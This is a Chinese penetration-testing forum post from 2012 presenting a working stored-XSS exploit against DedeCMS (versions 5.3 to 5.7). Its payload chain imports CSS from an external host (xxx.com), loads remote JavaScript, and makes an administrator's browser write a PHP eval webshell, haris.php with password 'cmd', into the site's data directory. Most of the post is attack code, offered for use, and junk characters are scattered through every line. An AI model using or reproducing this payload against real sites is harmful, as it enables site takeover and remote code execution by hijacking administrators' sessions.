找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 dedecms xss oday通杀所有版本 可getshell
返回列表 发新帖
查看: 2283|回复: 0
打印 上一主题 下一主题

dedecms xss oday通杀所有版本 可getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-9-15 13:56:10 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
<DIV id=read_tpc mb10?>漏洞原因:由于编辑器过滤不严,将导致恶意脚本运行。可getshell( u, A3 N4 ^8 ?' }% ^+ S; i( p1 @. }- S
为什么说它是ODay呢,能getshell的都算OD把`(鸡肋发挥起来也能变凤凰)
8 w/ s- X% Q% B: P1 Z8 m目前只是测试过5.3到5.7版本。其他更早的版本大家就自由发挥吧。; z7 `" |+ a* _5 [
下面说说利用方法。
* z' i; _) k  i5 {4 Z0 p, h条件有2个:/ A- K+ f# j" x+ U! z
1.开启注册9 y) p, r' f: M
2.开启投稿
/ ^- m- m( X1 f  H2 t) y; V注册会员----发表文章
" T0 J( ^, u6 N内容填写:
& N0 m8 x6 t- m2 |8 w" ~复制代码
+ T% O- R- B* d! w& s<style>@im\port'\http://xxx.com/xss.css';</style>( V* {% M1 U- k" K1 ^; b
新建XSS.Css
8 Q9 w. Y# j$ ~4 T: ]0 j  S复制代码
' M& r+ A3 N' _' k" }.body{+ C; [6 n" N5 M9 X4 v8 `6 R$ E
background-image:url('javascript:document.write("<script src=http://xxx.com/xss.js></script>")') }; D' ~  F. S7 G" G! J
新建xss.js 内容为
; {  {; F9 y- D( ]6 u复制代码2 v1 l3 X9 _" O% I  ?. Z5 P. y
1.var request = false;
& z5 Q# L8 c" [; h5 [; C2.if(window.XMLHttpRequest) {$ |9 Y4 Z/ ]5 ?3 B% c: r
3.request = new XMLHttpRequest();
# X* H2 P: V7 O$ }) I  @4.if(request.overrideMimeType) {
8 B5 u# [* j8 \: s, [5.request.overrideMimeType('text/xml');. r8 K7 u& k& d- t7 N
6.}- h  M( ^5 ~! d; t% {8 a
7.} else if(window.ActiveXObject) {
( @7 Z! x% t* a2 f8.var versions = ['Microsoft.XMLHTTP', 'MSXML.XMLHTTP', 'Microsoft.XMLHTTP', 'Msxml2.XMLHTTP.7.0','Msxml2.XMLHTTP.6.0','Msxml2.XMLHTTP.5.0', 'Msxml2.XMLHTTP.4.0', 'MSXML2.XMLHTTP.3.0', 'MSXML2.XMLHTTP'];
$ j' `" f* ^9 l& K8 u8 o9 Q9.for(var i=0; i<versions.length; i++) {# e3 g; W9 t2 u2 z, ]0 ^1 n6 b, q
10.try {# G( M2 t% A1 `) M8 s4 J
11.request = new ActiveXObject(versions);
5 I# t7 ^1 \' ^8 ?: n# E12.} catch(e) {}: |) s' v( f7 D7 h/ y
13.}4 E# T" \- G1 s
14.}
1 `- z7 U7 n2 G, @' C' @; c! L8 G15.xmlhttp=request;8 R3 @2 _4 _8 F- f% u8 j
16.function getFolder( url ){
5 e, Q% `8 e" ~; N6 V# z/ V% L8 u! P17. obj = url.split('/'). c! h& R9 |/ G0 m0 U' R
18. return obj[obj.length-2]9 j1 y8 V9 ?6 m, v! H& z
19.}
3 F8 z( R$ P) q) F' u) x20.oUrl = top.location.href;
1 C0 x) r+ z: C  o' I21.u = getFolder(oUrl);
/ |% ?1 I$ m( W. |+ k4 t22.add_admin();, u6 G, z& e# m- \' f+ W9 |
23.function add_admin(){' z, s2 N- u& Y8 S2 c
24.var url= "/"+u+"/sys_sql_query.php";; h& k& `0 v! G+ a$ X! y
25.var params ="fmdo=edit&backurl=&activepath=%2Fdata&filename=haris.php&str=<%3Fphp+eval%28%24_POST%5Bcmd%5D%29%3F>&B1=++%E4%BF%9D+%E5%AD%98++";
' Z# \, u* r5 f& e! Z26.xmlhttp.open("POST", url, true);+ F6 u  y+ W! m: m; c; [
27.xmlhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");. b7 C: D2 Z, a% f0 o1 E
28.xmlhttp.setRequestHeader("Content-length", params.length);& x* U) I* A7 n2 a/ j
29.xmlhttp.setRequestHeader("Connection", "Keep-Alive");$ E- s/ g1 g# a9 ?' h5 v
30.xmlhttp.send(params);
' E5 K% V2 C( C( w( u; G( W1 \31.}
3 L, u' `4 t# Z6 o当管理员审核这篇文章的时候,将自动在data目录生成一句话haris.php。密码cmd
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表